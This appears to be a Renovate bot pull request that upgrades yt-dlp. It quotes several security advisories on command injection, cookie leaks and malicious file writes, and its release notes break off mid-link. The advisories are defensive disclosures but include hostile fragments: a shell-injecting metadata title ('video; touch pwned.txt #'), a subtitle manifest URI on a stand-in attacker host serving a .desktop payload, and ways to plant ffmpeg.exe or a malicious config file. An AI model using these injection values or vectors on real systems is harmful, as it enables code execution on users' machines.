Update dependency yt-dlp to v2026 [SECURITY]#91
Open
renovate[bot] wants to merge 1 commit into
Open
Conversation
Codecov ReportAll modified and coverable lines are covered by tests ✅
Additional details and impacted files@@ Coverage Diff @@
## master #91 +/- ##
==========================================
+ Coverage 85.71% 88.39% +2.67%
==========================================
Files 5 5
Lines 112 112
==========================================
+ Hits 96 99 +3
+ Misses 16 13 -3 ☔ View full report in Codecov by Sentry. |
renovate
Bot
force-pushed
the
renovate/pypi-yt-dlp-vulnerability
branch
from
1e7df99 to
83a4b48
Compare
renovate
Bot
force-pushed
the
renovate/pypi-yt-dlp-vulnerability
branch
from
83a4b48 to
482b906
Compare
renovate
Bot
changed the title
Contributor
Author
|
renovate
Bot
changed the title
renovate
Bot
changed the title
renovate
Bot
force-pushed
the
renovate/pypi-yt-dlp-vulnerability
branch
2 times, most recently
from
482b906 to
4ac12ca
Compare
renovate
Bot
changed the title
renovate
Bot
changed the title
renovate
Bot
force-pushed
the
renovate/pypi-yt-dlp-vulnerability
branch
2 times, most recently
from
4ac12ca to
ad366bf
Compare
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
^2024.0.0→^2026.0.0yt-dlp File system modification and RCE through improper file-extension sanitization
CVE-2024-38519 / GHSA-79w7-vh3h-8g4j
More information
Details
Summary
yt-dlpdoes not limit the extensions of downloaded files, which could lead to arbitrary filenames being created in the download folder (and path traversal on Windows). Sinceyt-dlpalso reads config from the working directory (and on Windows executables will be executed from the yt-dlp directory) this could lead to arbitrary code being executed.Patches
yt-dlpversion 2024.07.01 fixes this issue by whitelisting the allowed extensions.This means some very uncommon extensions might not get downloaded; however, it will also limit the possible exploitation surface.
Workarounds
It is recommended to upgrade yt-dlp to version 2024.07.01 as soon as possible, always have
.%(ext)sat the end of the output template, and make sure you trust the websites that you are downloading from. Also, make sure to never download to a directory within PATH or other sensitive locations like your user directory,system32, or other binaries locations.For users not able to upgrade:
--ies default,-generic)-o "%(title)s [%(id)s].%(ext)s)--write-subs,--write-auto-subs,--all-subs,--write-srt)--ignore-config --config-location ...to not load config from common locationsDetails
One potential exploitation might look like this:
From a mimetype we do not know, we default to trimming the leading bit and using the remainder. Given a webpage that contains
this will try and download a file called
ffmpeg.exe(-o "%(title)s.%(ext)s).ffmpeg.exewill be searched for in the current directory, and so upon the next run arbitrary code can be executed.Alternatively, when engineering a file called
yt-dlp.confto be created, the config file could contain--exec ...and so would also execute arbitrary code.Acknowledgement
A big thanks to @JarLob for independently finding a new application of the same underlying issue.
More can be read about on the dedicated GitHub Security Lab disclosure here: Path traversal saving subtitles (GHSL-2024-090)
References
Severity
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:HReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
yt-dlp has dependency on potentially malicious third-party code in Douyu extractors
GHSA-3v33-3wmw-3785
More information
Details
Impact
yt-dlp's DouyuTV and DouyuShow extractors used a
cdn.bootcdn.netURL as a fallback for fetching a component of the crypto-js JavaScript library. When the Douyu extractor is used, yt-dlp extracts this JavaScript code and attempts to execute it externally using PhantomJS.bootcdn.netis owned by the bad actor responsible for the Polyfill JS supply chain attack that has been ongoing since at least June 2023. While there is no evidence that PhantomJS has been targeted by or is vulnerable to any attacks carried out by the Polyfill JS actor, there is the possibility that malicious JavaScript code may have been downloaded/cached by yt-dlp or executed by PhantomJS.In order for this potential vulnerability to be exploited by any hypothetical attack, all 3 of the following conditions must be met:
douyu.comordouyutv.comURL to yt-dlp as input, or passes a URL that redirects to one of these domains.cdnjs.cloudflare.comis unavailable or blocked at the time of extraction, necessitating the usage of thecdn.bootcdn.netfallback; or it had been unavailable during a previous run of the Douyu extractor and JavaScript code fromcdn.bootcdn.nethad been cached to disk.Patches
yt-dlp version 2024.07.07 fixes this issue by removing the URL pointing to the malicious CDN and by invalidating any Douyu extractor cache data created by unpatched versions of yt-dlp.
Workarounds
It is recommended to upgrade yt-dlp to version 2024.07.07 as soon as possible.
For users not able to upgrade:
--ies default,-douyutv,-douyushow)Acknowledgement
Thanks to @LeSuisse for reporting this promptly after
bootcdn.netwas discovered to be under control of the same bad actor behind thepolyfill.iosupply chain attack.References
Severity
Low
References
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
yt-dlp: Arbitrary Command Injection when using the
--netrc-cmdoptionCVE-2026-26331 / GHSA-g3gw-q23r-pgqm
More information
Details
Summary
When yt-dlp's
--netrc-cmdcommand-line option (ornetrc_cmdPython API parameter) is used, an attacker could achieve arbitrary command injection on the user's system with a maliciously crafted URL.Impact
yt-dlp maintainers assume the impact of this vulnerability to be high for anyone who uses
--netrc-cmdin their command/configuration ornetrc_cmdin their Python scripts. Even though the maliciously crafted URL itself will look very suspicious to many users, it would be trivial for a maliciously crafted webpage with an inconspicuous URL to covertly exploit this vulnerability via HTTP redirect. Users without--netrc-cmdin their arguments ornetrc_cmdin their scripts are unaffected. No evidence has been found of this exploit being used in the wild.Patches
yt-dlp version 2026.02.21 fixes this issue by validating all netrc "machine" values and raising an error upon unexpected input.
Workarounds
It is recommended to upgrade yt-dlp to version 2026.02.21 as soon as possible.
Users who are unable to upgrade should avoid using the
--netrc-cmdcommand-line option (ornetrc_cmdPython API parameter), or they should at least not pass a placeholder ({}) in their--netrc-cmdargument.Details
yt-dlp's
--netrc-cmdoption can be used to run any arbitrary shell command to retrieve site login credentials so that the user doesn't have to store the credentials as plaintext in the filesystem. The--netrc-cmdargument is a shell command with an optional placeholder ({}). If the placeholder is present in the argument, it is replaced with the netrc "machine" value, which specifies the site for which login credentials are needed.The netrc "machine" value is usually explicitly defined in yt-dlp's extractor code for a given site. However, yt-dlp has four extractors where the netrc "machine" value needs to be dynamically sourced from the site's hostname. And in three of those extractors (
GetCourseRuIE,TeachableIEandTeachableCourseIE), wildcard matches are allowed for one or more subdomains of the hostname. This can result in a netrc "machine" value that contains special shell characters.The
--netrc-cmdargument is executed by a modified version of Python'ssubprocess.Popenwithshell=True, which means that any special characters may be interpreted by the host shell, potentially leading to arbitrary command injection.Here is an example of maliciously crafted URL input that exploits the vulnerability:
Although only 3 of yt-dlp's extractors are directly susceptible to this attack, yt-dlp's "generic" extractor will follow HTTP redirects and try to match the resulting URL with one of the dedicated extractors. This means that any URL processed by the generic extractor could ultimately lead to a maliciously crafted URL that is matched by one of the vulnerable extractors. Hypothetically, an attacker could create a website with an inconspicuous URL and legitimate-looking media content that would serve an HTTP redirect to a maliciously crafted URL when it detects a request from yt-dlp.
References
Severity
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:HReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
yt-dlp: File Downloader cookie leak with curl
CVE-2026-50019 / GHSA-f7j3-774f-rfhj
More information
Details
Summary
If curl is used an external downloader for yt-dlp, cookies may be leaked to an unintended host upon HTTP redirect or when the host for download fragments differs from their parent manifest's.
This is the equivalent to GHSA-v8mc-9377-rwjj for the
curldownloader. The vulnerable behavior is present in yt-dlp released since 2023.09.24.Details
At the file download stage, the cookies are passed by yt-dlp to the file downloader via
--cookie. However, unless these are loaded from a file, this operation does not activate the cookie engine. As a result,curlwill send cookies with requests to domains or paths for which the cookies are not scoped.An example of a potential attack scenario exploiting this vulnerability:
curl.curlforwards the user's sensitive cookie information.Patches
yt-dlp version 2026.06.09 fixes this issue by doing the following:
--cookie -ifcurlis version 7.59 or higher.--cookie /dev/fd/0if the system supports this device file.--cookie <file>.Workarounds
It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.
For users who are not able to upgrade:
--downloader curl.Severity
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
yt-dlp: Dangerous file type creation via insufficient filename sanitization (Bypass of CVE-2024-38519)
CVE-2026-50023 / GHSA-c6mh-fpjc-4pr3
More information
Details
Summary
A vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as
.desktop,.url,.webloc) to the user's filesystem, bypassing the remediation forCVE-2024-38519.Details
The fix for
CVE-2024-38519enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as.exeor.sh) during file downloads. However, this allowlist explicitly included the unsafe extensions.desktop,.url, and.weblocso that the functionality of the--write-linkoption (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download.Numerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an
EXT-X-MEDIA:TYPE=SUBTITLEStag with a malicious URI (e.g.,URI="http://attacker/x.desktop"), which would result in yt-dlp writing the attacker-controlled content to a file with a.desktopextension if the user had passed the--write-subsoption.Writing OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments.
While these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a "subtitles"/media file, leading to a phishing attack or arbitrary code execution.
Proof of Concept
1. Start a malicious server:
Host a malicious
master.m3u8manifest that points to malicious subtitle payloads:And host the
payload.desktopfile with malicious content:2. Trigger the download:
In this case, the generic extractor triggers the exploit if the
--write-subsoption is used:Result: yt-dlp writes
MyVideo.en.desktopto disk, containing the attacker payload.Patches
yt-dlp version 2026.06.09 fixes this issue by removing
.url,.desktopand.weblocfrom the global file extension allowlist, and by only allowing those file types to be written from within the context of the--write-linkoptions' functionality.Workarounds
It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.
Users who are not able to upgrade should do ALL of the following:
--write-subs,--write-auto-subs,--embed-subs,--write-thumbnail,--write-all-thumbnails, or--embed-thumbnailoptions--format -to interactively select download formats and validate their file extensionsSeverity
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:HReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
yt-dlp: Arbitrary code execution via manifest downloads with aria2c
CVE-2026-50574 / GHSA-vx4q-3cr2-7cg2
More information
Details
Summary
If aria2c is used as an external downloader for a fragmented manifest format (such as an HLS/DASH stream), yt-dlp passes insufficiently sanitized input to aria2c that allows an attacker to perform an arbitrary file write. On Windows platforms, this can lead to immediate arbitrary code execution. On non-Windows platforms, this can lead to arbitrary code execution upon the next invocation of yt-dlp.
Details
When downloading a fragmented manifest format such as an HLS or DASH stream, yt-dlp first extracts a list of all fragment URLs from the stream's manifest. If the user has selected aria2c as an external downloader, yt-dlp then constructs an input file for aria2c from the fragment URL list and passes its filepath as the argument to aria2c's
-ioption.aria2c's
-i(or--input-file) option allows for downloading a list of URIs from the given text file. The text file must be formatted as a list of URIs separated by newlines. aria2c's format permits configuration lines for each URI, which can contain command-line options to be given to aria2c. These optional lines follow each URI line and are signified only by leading whitespace. yt-dlp constructs the input file with these optional lines so that it's able to specify the output filename for each fragment using theout=option.yt-dlp's utilization of the aria2c input file format presents two known attack vectors:
An attacker can craft a malicious DASH manifest with one or more fragment URLs that contain
&#​10;, which is the HTML escape sequence for a newline. yt-dlp interprets this escape sequence as an actual newline character when writing the fragment URLs to the aria2c input file, which allows for an attacker to inject arbitrary aria2c options into the input file. With option injection, the attacker can achieve arbitrary file writes. This attack vector is possible only via downloads of DASH formats, since their manifests are an XML format which necessitates unescaping of HTML special characters.An attacker can craft a malicious metadata response where the data parsed by yt-dlp as the
titlefield (or any other metadata field that the user includes in their output template) contains strategically placed newlines and magnet URIs. If the user has passed the--no-windows-filenameoption to disable sanitization of newlines in output filenames, the attacker is able to achieve arbitrary file writes by injecting arbitrary URIs and options into the aria2c input file. This attack vector is possible via downloads of both HLS and DASH formats.On Windows, attacker-controlled file writes can lead to immediate arbitrary code execution: the attacker could write a malicious executable file named
ffmpeg.exeto the current working directory, and it could be invoked during the postprocessing stage if the user'syt-dlp.exealso resides in the current working directory.On all platforms, attacker-controlled file writes can lead to arbitrary code execution on repeat invocations of yt-dlp: the attacker could write a yt-dlp configuration file (
yt-dlp.conf) to the current working directory containing a malicious--execargument.Patches
yt-dlp version 2026.06.09 fixes this issue by removing support for downloading fragmented manifest formats with aria2c.
Workarounds
It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.
For users who are not able to upgrade:
--downloader dash,m3u8:nativeto your yt-dlp command.Severity
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:HReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
yt-dlp: Arbitrary command injection possible if --exec option used with yt-dlp
GHSA-69qj-pvh9-c5wg
More information
Details
Summary
yt-dlp's
--execoption is vulnerable to arbitrary command injection when handling untrusted metadata if the argument uses standard string formatting (e.g.%(title)s) or other unsafe conversions. An attacker could achieve remote code execution on the user's machine via maliciously crafted metadata containing quotes or other special shell characters.Details
Since yt-dlp version 2021.04.11, the
--execoption has supported "output template syntax", which is a superset of Python'sprintf-style string formatting also used by the--outputoption. This means the user is able to pass a "command template" as an argument to the--execoption which will be executed by the user's shell. The command template allows for the downloaded video's metadata to be interpolated into the command string.yt-dlp implements a
%()qconversion, which will shell-quote/escape any metadata value such that it is safe to be interpolated into a command string. However, there are unsafe conversions such as%()swhich result in the command template being formatted with the raw metadata string. These unsafe conversions do not perform any sanitization or escaping for shell contexts. If one or more of these unsafe conversions is used in the command template, an attacker can craft a malicious metadata value containing shell operators (e.g.;,&,|) to break out of the intended command and execute payload commands.Impact
The impact is limited to users who pass an
--execcommand template containing unsafe conversions in their yt-dlp command or configuration file:%()s,%()a,%()r,%()j,%()S(including any of their flagged variants.)Patches
yt-dlp version 2026.06.09 fixes this issue by restricting the conversions that can be used in an
--execcommand template to those known to be safe:%()d,%()i,%()f,%()q(including any of their flagged variants.) It also restricts the characters that can be used in command template defaults and placeholders when the user passes an--execargument containing output template syntax.Workarounds
This vulnerability can be fully mitigated by doing any of the following:
%()d,%()i,%()f,%()q) in any--execcommand templates--execarguments--execoptionProof-of-Concept
video; touch pwned.txt #--execflag.Reproduction steps (simulated):
python3 poc.pyPWNED.txtwill be created, proving arbitrary command execution.Severity
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:HReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
Release Notes
yt-dlp/yt-dlp (yt-dlp)
v2026.6.9Compare Source
v2026.3.17Compare Source
v2026.3.13Compare Source
v2026.3.3Compare Source
v2026.2.21Compare Source
v2026.2.4Compare Source
v2026.1.31Compare Source
v2026.1.29Compare Source
v2025.12.8Compare Source
v2025.11.12Compare Source
Important changes
yt-dlp now requires users to have an external JavaScript runtime (e.g. Deno) installed in order to solve the JavaScript challenges presented by YouTube. Read more
Core changes
--cookies-from-browserfor Safari on iOS (#14950) by pha1n0qhookcategory (#14845) by seproDevExtractor changes
tv_downgradedclient (#14887) by seproDev (With fixes in fa35eb2)web_embeddedclient extraction (#14843) by bashonly, seproDevDownloader changes
ffmpeg_argsfor each format (#14886) by bashonlyNetworking changes
Misc. changes
install_depsscript (#14766) by bashonlyv2025.10.22Compare Source
Important changes
Some formats may still be unavailable, especially if cookies are passed to yt-dlp. The NEXT release, expected very soon, will require an external JS runtime (e.g. Deno) in order for YouTube downloads to work properly. Read more
Python 3.9 has reached its end-of-life as of October 2025, and yt-dlp has now removed support for it. Read more
Core changes
Extractor changes
Misc. changes
v2025.10.14Compare Source
Core changes
prefer-vp9-sortcompat option (#14603) by seproDevExtractor changes
v2025.9.26Compare Source
v2025.9.23Compare Source
v2025.9.5Compare Source
v2025.8.27Compare Source
[
v2025.8.22](https://redirect.giConfiguration
📅 Schedule: (UTC)
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.